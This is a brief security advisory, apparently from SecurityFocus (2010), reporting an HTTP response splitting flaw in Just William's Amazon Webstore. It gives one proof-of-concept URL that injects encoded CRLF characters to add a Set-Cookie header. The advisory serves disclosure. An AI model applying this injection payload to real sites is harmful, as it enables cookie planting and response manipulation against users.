Just William's Amazon Webstore HTTP Response Splitting Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/store/uk/product/">%0d%0aSet-Cookie:%20HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm


 

Privacy Statement
Copyright 2010, SecurityFocus